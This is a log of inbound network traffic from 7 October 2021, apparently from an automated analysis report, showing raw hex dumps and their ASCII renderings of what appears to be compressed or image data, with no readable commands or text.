2021-10-07 13:51:55 UTC	168	IN	Data Raw: 12 ae c4 15 bb 13 04 2e e1 b2 1b 08 95 b1 ab 4e 45 19 d2 2d 95 c8 1a 19 20 27 4f 9e 52 d7 49 1c d5 d2 ad 11 df 76 d9 87 a5 20 f4 ab 0e 2e 1a b6 3e b6 aa 8f 52 ae 5d 03 63 62 af da 18 0b 45 34 6a 52 2e b4 9d c6 e4 d6 65 79 38 f0 1f 11 bf 53 33 43 3d 86 08 e3 df ea 03 6c 83 5d 77 92 75 9a b5 b1 58 59 69 95 9a 65 7c a3 bf 58 6b 77 9b c3 4e 84 56 81 24 59 f1 2e d1 80 51 b6 df 9a 50 99 de ed 82 84 36 e0 78 8b 66 de 66 53 4a 9f 98 72 aa 05 1e ac 94 b4 11 b9 fd 60 19 c8 12 a2 9d a0 97 08 e2 89 6a b7 fa f2 0a c0 45 d6 2e 9d 1e d4 1d c9 91 83 0e 94 f9 49 fa d0 e7 7d e4 54 d9 41 d2 19 95 f9 30 b6 9b 07 62 d6 1c d7 14 33 9a 16 73 b4 9a bf 0a 5d f7 35 50 c5 a6 22 be 0d 79 59 bb 4d 30 72 19 80 e3 d0 85 f9 b4 8f 7e 1c 9f b5 56 45 d5 6d 0c e7 31 dc ca 2a fc b8 2d 99 68 Data Ascii: .NE- 'ORIv .>R]cbE4jR.ey8S3C=l]wuXYie\|XkwNV$Y.QP6xffSJr`jE.I}TA0b3s]5P"yYM0r~VEm1*-h
2021-10-07 13:51:55 UTC	170	IN	Data Raw: eb d2 ca 76 a9 11 ec 14 cd 36 a2 5e 12 1e 3b 85 0c 0f b4 75 6a 12 86 85 31 df b0 f7 85 3a 2e 80 f5 55 0f 1d 1f b1 eb 95 a6 d6 0b ad ca b4 f7 93 f4 e4 7b 88 05 ac 59 31 be 71 a4 de b5 8c a4 c4 3c 50 4e 8b 77 9c 99 f6 d3 78 86 19 ac be c9 c2 12 ab 62 6f 71 1d 5f 34 00 92 7c 31 b2 be 0e 3d 43 2b fc 29 68 e6 61 35 60 ee 99 2b 48 0b 32 32 78 fd 61 67 8f 3d 4b a4 4a 5f f2 b5 89 fa 2a 9e 2d 46 11 76 b4 c2 6b bd 47 bf ff 00 ce f5 1b 2f 1a 2e 75 66 1b 91 fe 29 3f cc ea 77 29 ca f4 17 1e 62 c7 cc 5f 18 ef 49 7f 56 cd 65 67 c4 d6 af 6f da 5b a9 d8 75 c7 78 e4 21 11 00 03 b1 e4 c9 36 14 f9 96 ab 3f 92 31 8c 1d 34 fd 16 dc e3 a7 9c 44 a2 c2 9f 1e 48 dc fc 53 ab 29 e5 a0 d0 b9 07 90 d6 5d ed 8d ae 1d fd dd eb fa 8c 50 54 41 3c 34 ba e7 8f 75 86 7d d6 ae 9f ac 74 b3 a4 Data Ascii: v6^;uj1:.U{Y1q<PNwxboq_4\|1=C+)ha5`+H22xag=KJ_*-FvkG/.uf)?w)b_IVego[ux!6?14DHS)]PTA<4u}t
2021-10-07 13:51:55 UTC	171	IN	Data Raw: 19 c2 e9 95 c3 58 e4 0f 3f 22 b7 13 12 3c 31 5a 29 15 5b 3d 95 58 96 11 27 b4 d4 ab 22 17 33 16 b7 4f 37 a8 6c cb 60 a0 3a bd da a0 09 87 53 de 72 db 1f 27 af 63 c7 7a 95 8a c9 71 7b 7c e2 9d b7 c9 2b 3e a6 3d 3e a3 c3 2a d5 68 81 1c b2 57 8a 2c e7 59 65 ae 88 25 02 62 a6 c9 58 61 64 ae 26 41 81 76 10 85 b5 30 cb 34 60 07 f4 28 fb e2 76 df 24 ba ca 44 d1 fd d8 08 9e 0d a3 83 61 a5 da 49 b5 d5 aa 70 8c d4 c9 4d 8b 78 72 66 24 87 64 38 dc 18 e1 63 16 bf 31 e4 13 a9 1b 98 ad 8c 06 2a df 7e 57 6a d8 e0 9e 5d 2c 17 ae 77 2f 44 26 76 70 5f ae b0 f9 51 42 38 e2 d2 d7 f9 5f 91 74 fe 00 a9 a2 0b 0a ce 77 61 43 6b 3b 4b 87 43 39 3d 82 df d9 31 09 6a b6 5e 2a a5 e3 fe a2 bc 24 9b 40 23 98 0c f8 7c b1 ec fc ac 50 91 54 2e 88 f9 6f 2e 1f b1 bf 58 91 79 c9 79 82 e4 4c Data Ascii: X?"<1Z)[=X'"3O7l`:Sr'czq{\|+>=>hW,Ye%bXad&Av04`(v$DaIpMxrf$d8c1~Wj],w/D&vp_QB8_twaCk;KC9=1j^*$@#\|PT.o.XyyL
2021-10-07 13:51:55 UTC	172	IN	Data Raw: 10 e3 c4 36 0d 3f 4e 1f 65 31 3c 36 91 a5 cc 38 31 15 20 35 1e d7 0a 8c 7b 10 0c bc 3f 44 fc 54 39 bc 1b 0a 23 78 35 e3 24 aa 1a 6f bb 81 11 9b 59 c4 0b 7c 99 a1 98 8b a1 07 86 63 c3 0a 8a b8 b1 ec e4 ff 00 11 33 22 64 35 07 44 b1 37 02 e3 26 ec 98 70 6f 61 cc 65 c4 1b ee 28 53 fb 44 b4 c6 7d 82 36 52 37 d3 30 e7 15 a7 ee 6b a3 a7 e6 6b c8 d8 c8 20 d8 98 43 86 03 58 8d c1 be cd 32 0c 76 2c 6e 61 55 07 79 af 43 da f3 5c 4e a7 8a 7d c5 2c 52 1d 6b 26 e4 77 83 c3 2e a2 7a b6 b2 f0 92 da 60 38 d4 7f a6 a7 f2 27 5b 23 71 a4 0f c4 3d 4d 36 20 ea b1 89 85 d9 79 37 17 c2 9b f5 38 9d 04 17 64 c1 e1 41 b2 5b 68 b8 d7 18 a2 61 7a 60 35 2e fc 5c cb d0 d4 05 ef 7d a2 81 63 49 35 32 d0 a3 32 33 68 dd 66 16 5d bd 1b 98 db 3e 2d bd d6 22 8c 97 90 16 13 12 e3 39 01 d4 63 Data Ascii: 6?Ne1<681 5{?DT9#x5$oY\|c3"d5D7&poae(SD}6R70kk CX2v,naUyC\N},Rk&w.z`8'[#q=M6 y78dA[haz`5.\}cI5223hf]>-"9c
2021-10-07 13:51:55 UTC	174	IN	Data Raw: a9 ac 98 84 80 d2 8d 09 b4 a6 80 08 aa 79 fb 8c a4 3d 42 33 f5 76 6f 4c 75 57 07 54 42 ba 4e 8e d0 be 43 84 d0 de 10 cd 88 86 6a 8a 10 21 17 71 06 2d 28 6e 15 62 41 53 10 e5 0e da b8 d3 b4 41 9f 20 c8 18 d4 44 c6 89 93 53 82 36 d8 45 ca 7a 75 8b 1d 6f cf 33 32 16 20 96 f5 54 e0 d7 9d 79 57 cc f4 f6 9b 91 0a a8 a9 66 6d 2c f6 30 b3 1e f3 20 cc 59 40 34 b1 80 2a 41 98 ca 69 a5 ed 09 ca c8 f4 00 8b ed 6d 47 7a 8b d3 00 8e 76 8a d8 82 29 ae f1 a9 98 53 54 03 30 cb 60 d8 a8 83 2b 3b eb 3b 10 45 40 be 19 41 b2 cc 44 19 72 3e 32 14 00 04 62 40 01 b9 94 00 be 61 02 12 f7 b5 4a 37 3b 40 01 e6 e2 a2 81 36 3c 11 08 df 72 0c 63 2a e5 40 00 8e 32 b8 ac 67 68 c7 4a 81 90 f6 9d 5c 28 6b 1a ee 61 cc fa 99 60 b8 2c 1d a0 50 57 dd c4 36 40 fa 8a ee 1d 28 9e 22 eb 39 18 b1 Data Ascii: y=B3voLuWTBNCj!q-(nbASA DS6Ezuo32 TyWfm,0 Y@4AimGzv)ST0`+;;E@ADr>2b@aJ7;@6<rc@2ghJ\(ka`,PW6@("9
2021-10-07 13:51:55 UTC	175	IN	Data Raw: 22 11 43 fe fa 26 0c 4e 7c 4d 2b 83 0a 09 44 75 f2 00 c7 41 77 2b 88 00 d7 e9 86 bc 0a 86 09 71 80 33 51 0a 88 b8 88 36 20 56 e6 5c 3b 7d a1 0c 7f 74 a7 1f be 10 ff 00 ca 53 df 2d 18 bf 1a b7 fa 98 fe 21 42 aa b2 73 36 52 2f 68 45 c6 ab 10 d7 98 1e bb 8b d8 84 72 d1 7c 89 56 a4 47 e9 7f a8 7b 5f d0 3b 8c 79 10 83 0f ca 8e d3 c7 fb 86 37 5f 2e 6e 59 26 94 c3 8b 35 82 1e a3 7a e7 82 fc 4a c8 9d b4 6d 96 89 26 15 7a fa cc f8 6c ac 18 ec 49 00 79 87 e2 31 9f bc 19 d2 e0 c8 84 8a 8f f1 08 8c 56 a3 7c 40 af 68 8b f1 0a 78 33 d7 41 e0 c1 f1 28 4d 54 1a fe d3 77 1c 81 dd 43 9c 5f 46 a1 ce be 16 2e 7b 3c ac b0 48 f9 0f 31 ba 95 00 f7 54 c6 81 59 e0 8d d7 51 be 9e a6 7d f1 aa d1 b2 60 53 ad 19 a4 d4 d5 78 12 c0 e2 a2 a9 71 c7 10 96 d8 86 11 86 a3 88 b8 4d 06 d4 43 Data Ascii: "C&N\|M+DuAw+q3Q6 V\;}tS-!Bs6R/hEr\|VG{_;y7_.nY&5zJm&zlIy1V\|@hx3A(MTwC_F.{<H1TYQ}`SxqMC
2021-10-07 13:51:55 UTC	176	IN	Data Raw: 05 b6 6b 31 91 4e b3 54 53 d4 5e 59 88 85 58 d7 da 3f ec 3f 99 44 97 81 29 2b ee 66 94 df ea 05 40 b1 aa 5b 5f 12 f1 68 54 27 ba 63 c9 90 50 11 83 17 3b 0a b3 dc 4c 78 f6 60 5a ea 07 45 6f 68 b1 03 1f 52 c2 f8 8c cd ee 15 56 65 a8 52 35 b8 f8 c7 f8 cd f0 4f 22 11 89 32 2e a0 75 cc 2e ec c3 55 8d 8d 8b 36 d9 2b 8e a6 25 a4 1c 5d 37 70 ad 9b 9a b4 21 ff 00 8c 08 c7 b8 a8 aa 20 1e 23 20 97 39 30 91 55 32 12 08 fe a1 71 46 23 6c 82 06 c6 13 af 74 46 21 b8 8f 65 ad bc c5 4c 63 20 b3 c4 d9 03 ae a2 e1 2f ba 9d 6a 31 7b 60 44 b5 02 88 b8 cb 88 a7 16 0d c2 70 a6 84 72 63 36 42 c8 15 6a 36 35 39 07 a8 de 26 23 56 00 f6 df eb d6 bb 96 2e 6f 64 ce e0 0c 66 ab e6 05 51 d0 88 71 0d ac 59 8b df 02 64 0d 63 68 11 43 21 b8 68 1e 07 98 d7 ed 30 86 2c 7f a8 b6 aa 6d 6e 1f Data Ascii: k1NTS^YX??D)+f@[_hT'cP;Lx`ZEohRVeR5O"2.u.U6+%]7p! # 90U2qF#ltF!eLc /j1{`Dprc6Bj659&#V.odfQqYdchC!h0,mn
2021-10-07 13:51:55 UTC	178	IN	Data Raw: 90 12 a8 8a bf 27 0a 4e a3 bd 5e 27 e1 3a 94 68 e5 85 b1 9c 3a 38 04 6a 2a d6 6b 4c 63 f3 58 46 8e b4 a4 7d d2 7e d0 8d 6d 61 26 72 88 60 97 ea 7b 00 36 0f 87 9e 3a 3a db 9e 50 85 b8 48 cd 00 e8 67 b7 94 28 d6 c5 5a 8a 4f 0c 76 2a ae e4 96 2c 7e b9 f6 91 3c 6d e3 07 5d 11 91 a8 62 2c 09 50 ee 14 90 3e e0 1d 67 fe d1 24 b2 06 64 8d 9c 06 60 bf 24 0f 92 06 95 90 8c 87 04 15 c7 e7 3a 49 23 71 95 75 60 c0 8f f0 47 ff 00 67 1d ff 00 de 95 7b 52 27 35 82 59 d5 1c 8f cf 13 a5 b1 22 38 52 95 51 a7 ff 00 d1 94 15 d2 cd 57 c7 94 92 c1 31 b9 61 f3 ec f9 03 50 c5 2f 90 38 94 31 63 9f be 35 1c fc e5 2e 4c 84 b9 c9 f9 39 27 3f f6 59 ec 87 8a c3 35 b5 87 c2 63 58 cb 97 85 db ca c8 ea 0f cf 0d 6c bb 68 b8 59 2e e6 57 cc 89 c5 01 55 f1 46 83 20 1e d8 8e f5 fa 11 ad 62 30 Data Ascii: 'N^':h:8jkLcXF}~ma&r`{6::PHg(ZOv,~<m]b,P>g$d`$:I#qu`Gg{R'5Y"8RQW1aP/81c5.L9'?Y5cXlhY.WUF b0
2021-10-07 13:51:55 UTC	179	IN	Data Raw: a0 63 9b 67 ec bf dd aa 31 32 58 c3 00 d0 ba 87 7a c1 71 c9 50 a1 c8 3f 20 76 35 5d f8 ff 00 4c e2 e0 c3 86 00 b8 05 79 26 7e fd 71 c6 95 5f 24 28 87 c2 7e d3 01 91 15 73 a2 90 c9 5e 59 15 e4 0e 57 18 53 90 5e 30 01 c7 e0 e9 19 5a c7 26 29 22 00 58 a7 c0 05 97 24 e7 e7 50 06 59 15 9b 98 85 82 ab 07 24 95 b0 ea 87 88 f9 24 1d 21 49 dc 3f 08 85 74 47 01 55 f2 04 2f 10 c7 df f4 fa d4 b4 72 8a 4b 08 a6 7f 21 e6 81 78 7d 34 8a e3 88 fd dc 41 27 3a 77 50 64 42 1d 37 1e 79 e7 c8 b6 2d 15 50 bd fc f7 ab 2f 1a 52 a6 63 49 de e5 78 c9 5c e4 00 09 56 0c 07 61 07 2c 1d 53 d8 63 89 54 99 b6 6d de 54 69 1d 0f 12 19 14 24 ab f9 3c 8e ad ed 9e ab b1 1a 25 99 2e ee 0d 2c 13 41 1f b7 3e 04 e4 01 00 74 54 8d 51 7e 28 ac cb 0c 93 47 2a 7e 09 56 62 08 27 4f 05 4d cd 63 48 85 Data Ascii: cg12XzqP? v5]Ly&~q_$(~s^YWS^0Z&)"X$PY$$!I?tGU/rK!x}4A':wPdB7y-P/RcIx\Va,ScTmTi$<%.,A>tTQ~(G*~Vb'OMcH
2021-10-07 13:51:55 UTC	181	IN	Data Raw: 6a af f4 d8 1a b4 86 10 3a 54 27 92 82 46 7e 49 d6 ce fb e0 9e 1b 10 2d 9b 76 0c af 2a 13 1a 48 c8 24 f7 82 3d a5 48 e2 74 de 38 9a 35 9a 21 58 45 59 d6 65 0d c4 20 01 19 48 e9 86 35 b5 6d f6 2b 22 c5 14 f5 eb c5 01 8c 7c 28 5c 00 a0 0d 6f 93 8d 92 58 62 c2 c8 f5 a2 b0 92 94 cb ab c4 b8 0a bc c8 d6 7f ad c5 1c 92 88 6c 24 86 2b 6f 1f 36 57 1d 33 1e 8f 26 23 52 25 9b 52 c1 18 e2 58 19 02 82 06 4a 91 fb 7e d9 d6 f3 74 55 db e5 35 55 aa 78 44 b2 f9 16 2c 2c 8c a3 be 2c 48 04 ea a5 f9 65 bd 2b ee c9 6b 73 8c 58 84 bb 14 15 99 03 37 32 14 f9 10 2e 9d 1e 4b b6 26 af 24 32 92 ff 00 4e 26 f3 42 09 fe 07 63 f1 ab b5 85 5d ce 59 36 c3 5c 9f f7 d4 2b 92 ea 14 e4 0e 03 5b 9e e3 77 70 94 59 bc f5 e2 8a b3 4d 14 08 11 23 e2 ee 48 03 4b 53 d4 36 36 0a 42 08 2c b2 08 92 Data Ascii: j:T'F~I-v*H$=Ht85!XEYe H5m+"\|(\oXbl$+o6W3&#R%RXJ~tU5UxD,,,He+ksX72.K&$2N&Bc]Y6\+[wpYM#HKS66B,
2021-10-07 13:51:55 UTC	182	IN	Data Raw: 57 2c 5c d7 9a 62 a7 c4 dc cc ad 85 09 f6 c0 1a b3 7e 32 6d a8 86 17 28 41 fa 67 04 96 c3 00 1f f6 64 83 f3 a8 bd 31 4e 72 64 4a aa 59 e4 32 1a ea 58 9e 59 5f ff 00 88 1a 70 d4 5e 51 07 8a bf d4 25 8f 2a 65 94 e0 1f 69 0b a6 87 e9 e2 82 67 cc 69 1f 25 9f b5 f6 a9 24 7f fb 80 d3 45 0d 28 90 c3 61 b9 32 4e 64 5c 90 72 00 eb 38 20 6a 26 a0 2c 7f ad 82 85 15 54 48 3e 39 bb 76 42 8d 6f 53 6d c9 76 c2 48 b2 29 8a b7 8b 0c a0 f1 c8 04 0d 5f 9e b6 ea c8 fb 71 5b 00 88 db cc 1c f8 cf 3e ba eb 1a 48 1d 11 23 73 2c bc df 2b 80 48 40 ba af b3 53 a8 8b 35 23 6e a4 9e 09 a7 0e 17 89 e3 df 4b 9e c6 b7 fb a9 22 72 44 da e2 ad 46 a3 b3 76 48 68 c4 f2 00 4f c1 3a 85 4c bb 4b b8 bd bb 6e 56 2e 99 e0 99 57 a4 12 4b 17 64 37 5e cd 50 db 26 be 32 92 79 5d bc 51 86 cf bd d3 91 Data Ascii: W,\b~2m(Agd1NrdJY2XY_p^Q%*eigi%$E(a2Nd\r8 j&,TH>9vBoSmvH)_q[>H#s,+H@S5#nK"rDFvHhO:LKnV.WKd7^P&2y]Q
2021-10-07 13:51:55 UTC	183	IN	Data Raw: 7e 46 a2 4a ed 46 93 56 90 31 2c 5d 97 e1 83 77 85 eb 5b 77 d6 41 35 36 bd 2c c9 fa 4e 40 fd 41 17 b7 da cc 7b 4d 56 f4 fe d6 7e a5 76 6a 9f 53 cf ce 3c e0 ab 3d 5a 9e 46 ed 33 db 81 a1 b8 1d be 4b b0 43 70 c4 21 25 65 93 93 85 50 cf ed c8 d5 bf 52 7f a0 94 87 85 59 04 7c 1c 32 46 65 e1 22 8e 47 27 dc 3a d6 dd e9 7d b5 6d ed ec f5 e1 83 87 33 9e 28 fe 51 90 c3 07 27 50 fa 82 cb d4 a1 57 e8 2a 4b 2b 88 82 5c 49 a2 91 ac 38 50 78 34 5c 99 46 a8 6d d3 d9 bf 66 49 ec 56 a6 85 e4 8c 9f f7 a6 9e 5e 23 91 39 d6 df 56 a8 f3 3d e8 95 96 d3 cc 5a 32 83 8c b1 92 a9 f9 c0 d2 59 b5 66 f3 3d 74 2f e2 72 c1 7d c5 42 b1 24 aa f5 ad df 7c 3f 51 2c ab 62 1a 86 05 53 20 1d 2b 4c 40 c6 46 ab d6 b4 cf 10 8d 6e db 9a dc b9 98 f1 42 63 8c 05 5d 4f e3 96 fd 6a f2 45 46 34 ae 23 Data Ascii: ~FJFV1,]w[wA56,N@A{MV~vjS<=ZF3KCp!%ePRY\|2Fe"G':}m3(Q'PW*K+\I8Px4\FmfIV^#9V=Z2Yf=t/r}B$\|?Q,bS +L@FnBc]OjEF4#
2021-10-07 13:51:55 UTC	185	IN	Data Raw: 10 0b 72 24 cb c8 0d 2a 49 52 6a 57 3c f1 92 17 cb 10 12 02 81 be 17 3f 63 a9 db 6c bb 56 e5 39 4d 36 59 64 59 6c f2 76 09 f2 a8 c4 f7 f8 07 55 f1 44 4d 1d 2b 7b 89 fa 9b 11 63 01 99 71 80 19 b4 96 ec a3 2b 56 77 55 01 9b 1f 0c 07 11 8d 6e 2f 5e cc 41 43 41 01 f0 c5 c5 c3 9e a2 18 20 81 8d 3a 08 1c 95 63 11 04 fb 98 91 c4 f6 31 9d 34 73 bb ab da 76 24 87 77 c9 38 04 9e bb d4 be 1b 5b 2d d8 e7 95 ab 92 61 4e 19 2d c4 13 cb 4d ba 8a b7 2c 78 6d 5f 73 13 c4 04 91 97 68 e0 89 b0 58 93 94 e4 75 61 aa c1 6a 21 6a 42 de c1 fa d9 cb e3 a5 c8 20 03 a9 e6 bd 15 d9 ac f2 2e 67 7f 14 88 83 90 c7 22 cb ed eb 8e 9a fe eb c9 e5 bb 65 83 43 55 cc 80 90 cf 0d 9a c0 9e 24 8c a7 b8 13 f7 d3 6f 13 da 62 f6 76 7a a2 3e a1 9d 4f 6a fe f4 49 3e 0f c1 e3 a9 7d 11 09 a6 f2 43 bb Data Ascii: r$*IRjW<?clV9M6YdYlvUDM+{cq+VwUn/^ACA :c14sv$w8[-aN-M,xm_shXuaj!jB .g"eCU$obvz>OjI>}C
2021-10-07 13:51:55 UTC	186	IN	Data Raw: bf 5e 71 62 53 0c 0a b3 42 c8 0c 71 02 07 10 7b e8 0d 4f bd 58 db 76 89 ad c9 05 44 35 eb 4a b1 15 6c 79 7e 5f ff 00 71 aa b4 2c c1 72 92 40 9b 64 2c d3 3c 13 17 47 25 d8 93 91 ed f7 0e 3a 22 f7 ff 00 7a a3 bb c8 2c 48 11 a4 8e 45 e4 c1 8f 7e fd 09 90 7c bb 77 a9 5e cd 6a 52 dc b1 04 7c 49 f0 c2 03 bf 10 4a f3 2a 3b e2 3b d7 ad 77 3b 89 e3 8e f5 c9 69 c5 b6 44 8f 17 69 5b 85 b5 9e 56 61 f8 46 d6 eb 7a 96 cb dc 13 ef 5b 4d 38 12 91 9e 40 5f 36 2a fe a4 87 ec 14 b7 79 24 eb 9d 9b ad 1f 91 d9 56 1e 45 3d a9 c6 38 f8 a2 ae 00 c6 b7 0d ef 6d 84 58 82 64 85 8c 2e 93 18 8f 89 cb 23 00 14 36 0f c9 d1 3b e5 a4 97 71 79 a7 82 c3 c5 e1 f2 01 18 aa a1 59 e4 6c 9d 6f f6 b7 2a d3 8a 7b 40 8c 73 99 ab c8 81 04 df 4d 08 ca 03 e5 21 96 46 27 5b 34 17 12 76 8a 7d b2 ce e1 Data Ascii: ^qbSBq{OXvD5Jly~_q,r@d,<G%:"z,HE~\|w^jR\|IJ;;w;iDi[VaFz[M8@_6y$VE=8mXd.#6;qyYlo*{@sM!F'[4v}
2021-10-07 13:51:55 UTC	187	IN	Data Raw: c1 07 f1 9d 59 79 ea 5f ae b5 23 49 18 b8 83 c4 55 91 42 fd bb ec 69 54 fc 95 cf 26 ff 00 ce 34 cc 89 18 45 c8 04 a2 7f 1d 68 29 c0 39 95 b0 ff 00 f8 03 5c 0b 1c fc 13 92 4e a1 90 b2 71 5c 82 38 63 e0 fb 4a eb 93 93 8e 63 20 e7 f1 f8 1a 1e 4f cb e5 be 7e 3a c1 ce 91 5d 83 3b 16 3c 9c 96 27 dd 8f b6 a6 ab 5d 92 00 3c f2 19 9a 49 23 45 59 8a c8 aa 83 05 f2 c0 63 a0 71 af 54 41 b9 dd 89 a2 be ef b9 0a 94 38 0e d7 06 05 12 b2 1f ee 19 04 6a 2d dd e5 ab 3c 6f 42 2a fe 1a 41 60 8f 9c 51 95 ed df 04 7d f5 b1 9f 52 c1 b7 8a 9b 7d 6d 93 6e 8a 69 28 af bc 04 2e a5 61 8b ee 18 67 98 0d a9 93 d3 ab 68 c3 35 4a 2f e3 25 25 c1 f0 cd 79 4c 4e a5 78 fc a1 4d 7f d4 3f 46 4a 8e 93 de 3b 76 f1 26 e7 4e 18 e3 05 e5 9c 49 14 a6 16 21 07 ed 9f 8e ab ee 7e a4 b1 2a 18 ce ea 22 Data Ascii: Yy_#IUBiT&4Eh)9\Nq\8cJc O~:];<']<I#EYcqTA8j-<oBA`Q}R}mni(.agh5J/%%yLNxM?FJ;v&NI!~"
2021-10-07 13:51:55 UTC	189	IN	Data Raw: 30 c3 65 c5 28 1c 91 02 91 19 c3 c7 2e 78 b3 77 c7 f7 6b d7 0b 7b 6c ab 9d d2 fc 70 43 15 09 a6 9b 83 3c 56 2b cf 17 8d ca 95 2a 88 ab 95 04 ea e6 e5 66 43 ca 4d c2 50 94 dd 3d bc 7f 48 53 10 a4 3f c2 0d 59 dc 6d 21 78 23 5d c3 73 96 56 48 26 21 dd c0 97 a7 71 c7 0b c8 80 06 a4 b9 17 d5 2f 1b 3b c3 d4 a3 1d 64 07 9c f3 cd 2c 73 4c 89 02 8e a3 eb 39 fb 6a dc 3b 92 c3 0b d8 f5 8a 89 76 69 6c f5 cd 1a 0c b4 32 d9 84 e7 29 cf 29 ad c9 f6 6a 77 e2 8a a5 79 a3 8d 08 96 b3 09 bc f2 da 99 48 3c 49 1c 51 4f 2d 6d 9b f9 8e 57 36 2a 0e 0d 9e 0e 55 5d aa ce 59 b0 31 d3 8e 9b 43 c5 28 78 dc 12 40 2a e3 07 3a 78 e3 82 76 33 c2 1d ca 09 6b b1 44 24 7c 36 32 42 93 a9 11 44 46 45 02 36 76 28 80 b3 be 14 12 55 00 c9 23 e0 0d 2d ef 13 c6 59 14 09 10 93 d8 8e 4c 74 0b 7c 71 Data Ascii: 0e(.xwk{lpC<V+fCMP=HS?Ym!x#]sVH&!q/;d,sL9j;vil2))jwyH<IQO-mW6U]Y1C(x@*:xv3kD$\|62BDFE6v(U#-YLt\|q
2021-10-07 13:51:55 UTC	190	IN	Data Raw: 49 2d b9 92 34 e4 5a 64 87 32 7b f5 54 4b ba c3 35 77 b7 ba cb 13 bb c6 57 b2 ab 33 24 30 ff 00 32 16 d6 ed 7a d4 90 c3 15 4a 56 43 c9 85 94 27 0b 90 ca dc d0 98 93 b8 72 0a 01 d8 07 4f e9 17 71 13 dd 97 73 85 e2 5b 4b 24 df 4c 92 c7 7e 2f 32 47 23 14 f9 68 bd dc b3 af 4d 7a 9a 0b 16 04 43 71 3f 4c 6e ed f2 1f 95 32 bf 18 26 45 fb b3 8e 7a 9b 78 9a 09 22 92 2a 74 25 66 fd 87 9f 03 60 84 e0 bf 94 89 75 4e 6b 89 09 63 b0 6e f0 09 10 b1 ec fd 2d ac a9 8d dc 65 40 93 92 f7 f2 34 d0 dc a1 2b d6 b9 59 f7 ae 1c 25 88 f1 65 28 6a 6b 66 f4 9f a7 a5 e6 2f 5a b4 6c ee 73 00 10 90 10 c4 d5 54 16 3a a0 cf 69 96 dd 6a 96 6c 08 1d eb 5a 72 d1 48 b2 b3 3c 45 44 65 59 f9 48 19 75 52 94 d7 27 98 d6 99 ad 70 2a 95 c8 0d 63 0a 0b 84 0c 70 30 0b 6b 66 b7 ba cb 75 d1 ec d1 81 Data Ascii: I-4Zd2{TK5wW3$02zJVC'rOqs[K$L~/2G#hMzCq?Ln2&Ezx"t%f`uNkcn-e@4+Y%e(jkf/ZlsT:ijlZrH<EDeYHuR'pcp0kfu
2021-10-07 13:51:55 UTC	191	IN	Data Raw: f7 1f aa ae f1 d3 94 58 36 a6 89 4b 3b 48 e5 13 89 6e 18 f7 49 d0 55 c8 c9 d3 4d 35 cb d5 a0 99 2a 6d 84 4d 21 91 bf d8 40 a6 46 58 c8 51 fa 9c be 07 20 d8 d5 47 99 68 55 7d ba 95 49 5a 28 6a 42 60 6e 49 1c f1 61 c4 6e 4f 6f d1 93 e0 6a 95 c4 b7 3d 73 14 f5 dd 41 48 79 b4 6a c0 b3 01 c7 0a 70 33 f3 f3 cb e3 5b ca d8 9f 11 44 d3 5b fd 5b 2c 1d 21 67 58 f8 80 82 4c fe e5 00 7e 01 d1 af 14 cb 0a 57 69 26 08 5b 07 94 28 8c ea 03 65 80 56 3d 05 fc ea d5 cb 16 bc a8 b0 37 0a b2 24 4d 92 b2 c8 bc 98 ad 70 40 01 64 51 93 af a4 55 54 7b 71 b0 72 63 87 88 43 22 b2 03 97 0c 49 62 c1 74 d0 c5 f5 04 07 81 59 57 8c 9c 65 54 56 f6 30 62 0e 00 e3 90 06 99 d6 39 92 b4 a1 a2 fd 29 7b 21 b2 79 87 f1 81 9e c0 3d f4 0e 8a 6f 15 aa 09 71 66 bc dc 05 68 72 1d c7 02 3e 40 03 fc Data Ascii: X6K;HnIUM5*mM!@FXQ GhU}IZ(jB`nIanOoj=sAHyjp3[D[[,!gXL~Wi&[(eV=7$Mp@dQUT{qrcC"IbtYWeTV0b9){!y=oqfhr>@
2021-10-07 13:51:55 UTC	193	IN	Data Raw: 95 5e 39 3c bc c4 ec 08 c1 ce 30 17 49 52 dd ed dd 67 36 2c b1 68 ca 46 99 76 90 12 01 1c 54 03 f1 a7 96 9d 77 99 59 23 43 1c 44 34 c5 9e 30 cc 0f 25 50 4a af 7f 1f 6d 49 56 e5 5d bd cd 81 66 c0 8d 14 ce a1 63 e5 1b 3b 2a 90 b1 e2 42 b8 e2 48 ec ea 56 a7 3c 8a 20 9e 69 e1 9d 5e b2 47 c1 1d 4a c8 1d c3 48 39 ab 10 3a 3d e9 a5 dc 61 82 0f 30 96 d4 78 32 cf 22 bc 92 c6 c1 78 b2 8f 60 53 91 f1 f8 19 d2 bc 62 ed 57 86 06 e0 cc f6 6e c2 41 02 ba 3a 31 11 b1 19 8f 83 00 1b 56 2a c7 b5 ca 65 7a 96 66 9e 32 f1 bc c7 8a 96 96 36 28 47 05 23 ff 00 a4 11 a5 b5 5e 8c 96 3c 76 24 99 67 2a 82 66 0a fe 68 40 2a 55 88 46 52 48 20 31 1a 9a a7 d0 4f 28 81 f9 3d 98 d9 85 a9 a0 1c cc 68 49 08 d8 ed 49 19 1f 93 aa 56 e4 46 8b c5 15 82 c9 1d 88 de 29 12 b1 46 9d 86 10 44 ac ea Data Ascii: ^9<0IRg6,hFvTwY#CD40%PJmIV]fc;BHV< i^GJH9:=a0x2"x`SbWnA:1Vezf26(G#^<v$gfh@UFRH 1O(=hIIVF)FD
2021-10-07 13:51:55 UTC	194	IN	Data Raw: f6 5d f8 0e d1 35 02 45 fd 2a 5a a7 66 a1 e6 fa 5f 2c b2 87 32 31 72 14 ff 00 80 10 76 74 a9 66 cb 88 d6 b4 33 c9 c9 61 8d c9 58 e6 65 7e 05 18 60 94 03 f9 27 51 56 8f 12 19 55 11 40 70 fd b7 22 41 3f 3d f5 f2 74 6c 5c ad 49 3e aa b2 83 27 92 b5 c9 56 36 82 58 14 1f 22 08 b9 13 ff 00 13 86 d6 da 2f 6d b2 59 ad 5b 71 de 67 92 c9 b3 0c 92 f9 79 4d 02 37 13 28 03 0a 49 3d 6a 2b 97 ea 4e f0 58 dd 6e c4 e2 18 9d 09 0c 22 89 b8 b3 b6 9f 7b dc 7d 41 ba d0 bd b8 dc 95 8c 5f d1 a8 47 2a 59 68 e9 ac 4b c0 3b 2c 40 92 14 eb 7e 5b 16 36 b9 c7 a7 2f fa 8d d2 ea 43 04 3f a4 e2 1a b5 42 aa f0 c1 3c a5 3d af 5c 75 b2 ff 00 d4 bd 8b 78 40 d4 ec 5d bf d2 e4 34 c7 84 b6 8c 16 10 81 f6 65 65 d7 a8 28 6e 9b a6 d9 17 3f 4a d7 be 2c ed c9 65 e4 f0 c3 28 9d 0a 62 44 e6 5b 92 ae Data Ascii: 